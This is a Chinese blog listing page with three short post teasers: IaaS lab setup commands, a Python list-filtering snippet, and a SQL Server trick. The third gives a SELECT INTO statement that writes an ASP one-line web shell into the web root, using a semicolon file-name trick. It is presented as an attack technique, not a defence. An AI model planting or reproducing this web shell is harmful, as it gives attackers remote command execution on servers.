摘要:
IaaS 平台构建 1.关闭防火墙,禁止开机自启 systemctl stop firewalld systemctl disable firewalld 2.设置主机名 hostnamectl set-hostname controller 设置主机名compute 3.设置selinux,per 阅读全文
摘要:
test = ['', 'ttt\n ', "123"] test = [x.strip() for x in test if x.strip() != ''] print(test) 阅读全文
摘要:
1、SQLServer执行SQL语句生成一句话 select '<%execute request("a")%>' into [NB_master] in 'd:\wwwroot\x.asp;a.xls''excel 8.0;' from NB_master; NB_master必须是已经存在的表 阅读全文